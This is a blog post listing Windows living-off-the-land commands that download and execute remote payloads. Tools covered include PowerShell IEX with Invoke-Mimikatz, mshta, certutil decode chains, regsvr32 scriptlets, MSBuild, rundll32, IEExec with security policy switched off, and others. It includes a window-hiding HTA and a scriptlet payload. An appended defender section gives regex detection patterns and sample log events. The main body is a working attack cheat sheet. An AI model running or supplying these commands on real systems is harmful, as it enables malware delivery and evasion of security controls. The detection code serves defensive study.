Windows download-and-execute commands

10 January 2018 · Information Security · 103 reads

Scenario requirements
• Allow execution of arbitrary code
• Support as many standard Microsoft code libraries as possible
• Support downloading the payload from a remote server

1. bitsadmin command (Windows 7 and later; can only download to a specified path):

bitsadmin /transfer myDownLoadJob /download /priority normal "http://www.example.com/1.jpg" "d:\abc.jpg"

2. PowerShell download and execute (Windows 7 and later):

powershell IEX (New-Object Net.WebClient).DownloadString('https://www.example.com/test.ps1'); Invoke-Mimikatz
powershell (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe','C:\test.exe')
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://example.com/1.jpg','d:\\1.jpg')
powershell -exec bypass -f \\webdavserver\folder\payload.ps1

3. mshta download and execute:

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
mshta \\webdavserver\folder\payload.hta

payload.hta:

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<script language="VBScript">
' Shrink the HTA window and move it off-screen so nothing is visible
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
' Launch a process through WScript.Shell (calc.exe as the harmless demo)
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
</HEAD>
<body>
demo
</body>
</HTML>

4. msiexec download and execute (the MSI file is loaded directly from the URL)

msiexec /q /i http://site.com/payloads/1.png

5. certutil download and execute

certutil -urlcache -split -f http://webserver/payload payload 
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
certutil -urlcache -split -f http://example.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete

6. regsvr32 download and execute

regsvr32 /u /n /s /i:http://webserver/1.jpg scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\1.jpg scrobj.dll
regsvr32 /u /s /i:http://site.com/js.png scrobj.dll

js.png:

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Learn from Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            ps = "cmd.exe /c calc.exe";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
    </script>
</registration>
</scriptlet>


8. MSBuild (.NET Framework) download and execute

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

9. cscript remote script download and execute

cscript //E:jscript \\webdavserver\folder\payload.txt


10. rundll32 download and execute

rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe  javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

11. Script file remote download and execute

downfile.vbs:
' Set your settings
strFileURL = "http://www.it1.net/images/1.jpg"
strHDLocation = "c:\1.jpg"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 ' Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing

Save the above as downfile.vbs
Run: cscript downfile.vbs

12. IEExec download and execute

C:\Windows\Microsoft.NET\Framework\v2.0.50727\> caspol -s off
C:\Windows\Microsoft.NET\Framework\v2.0.50727\> IEExec http://example.com/files/test64.exe

13. odbcconf download and execute

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

14. regasm (.NET Framework) download and execute

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

15. pubprn.vbs download and execute

cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://example.com/test.sct

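Added defender-side example, not part of the original post: a small Python classifier that tags process-creation command lines matching the download-and-execute patterns of the binaries listed above (bitsadmin, PowerShell, mshta, msiexec, certutil, regsvr32, rundll32, MSBuild, cscript, IEExec, odbcconf, regasm). The sample events, host names and tag names are constructed; the regexes are deliberately coarse and assume the CommandLine field of a process-creation log as input.

```python
import re

# Command-line patterns derived from the LOLBin commands listed on this page. Each tag
# names a technique; regexes are matched case-insensitively against a process command
# line (e.g. the CommandLine field of a Sysmon Event ID 1 record). They are coarse by design.
LOLBIN_PATTERNS = {
    "bitsadmin_transfer": r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?:",
    "powershell_download": r"\bpowershell(\.exe)?\b.*(downloadstring|downloadfile|\biex\b|invoke-expression)",
    "mshta_remote": r"\bmshta(\.exe)?\b.*(https?:|script:|\\\\)",
    "msiexec_remote": r"\bmsiexec(\.exe)?\b.*/i\s*<?https?:",
    "certutil_urlcache": r"\bcertutil(\.exe)?\b.*-urlcache\b",
    "certutil_decode": r"\bcertutil(\.exe)?\b.*-decode\b",
    "regsvr32_scrobj": r"\bregsvr32(\.exe)?\b.*/i:.*scrobj\.dll",
    "rundll32_script": r"\brundll32(\.exe)?\b.*(javascript:|\\\\)",
    "msbuild_remote": r"\bmsbuild(\.exe)?\b.*(/preprocess|\\\\)",
    "cscript_remote": r"\bcscript(\.exe)?\b.*(\\\\|pubprn\.vbs.*script:)",
    "ieexec_remote": r"\bieexec(\.exe)?\b.*https?:",
    "odbcconf_regsvr": r"\bodbcconf(\.exe)?\b.*/a\s*\{regsvr",
    "regasm_unregister": r"\bregasm(\.exe)?\b.*/u\b",
}
COMPILED = {tag: re.compile(rx, re.IGNORECASE) for tag, rx in LOLBIN_PATTERNS.items()}

def classify(cmdline):
    """Return the technique tags whose pattern matches this command line (empty if none)."""
    return [tag for tag, rx in COMPILED.items() if rx.search(cmdline)]

def scan(events):
    """events: iterable of (host, cmdline). Returns (host, tags, cmdline) for hits only."""
    hits = []
    for host, cmd in events:
        tags = classify(cmd)
        if tags:
            hits.append((host, tags, cmd))
    return hits

# Constructed sample process-creation records (not real telemetry); three are benign.
SAMPLE_EVENTS = [
    ("ws01", "certutil -urlcache -split -f http://webserver/payload.b64 payload.b64"),
    ("ws01", "certutil -decode payload.b64 payload.exe"),
    ("ws02", "certutil -hashfile C:\\Users\\a\\setup.exe SHA256"),  # benign use
    ("ws03", "regsvr32 /u /n /s /i:http://webserver/1.jpg scrobj.dll"),
    ("ws03", 'regsvr32 /s "C:\\Program Files\\Vendor\\vendor.dll"'),  # benign use
    ("ws04", 'mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))'),
    ("ws05", "powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://example.com/1.jpg','d:\\1.jpg')"),
    ("ws05", "powershell -NoProfile -Command Get-Process"),  # benign use
    ("ws06", "odbcconf /s /a {regsvr \\\\webdavserver\\folder\\payload_dll.txt}"),
]
```

Calling scan(SAMPLE_EVENTS) returns six hits; the three benign records (hash check, local DLL registration, plain Get-Process) produce no tags.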

Reference: https://xz.aliyun.com/t/1654#toc-12

Tags: none

Last edited: 2021-01-04 14:12
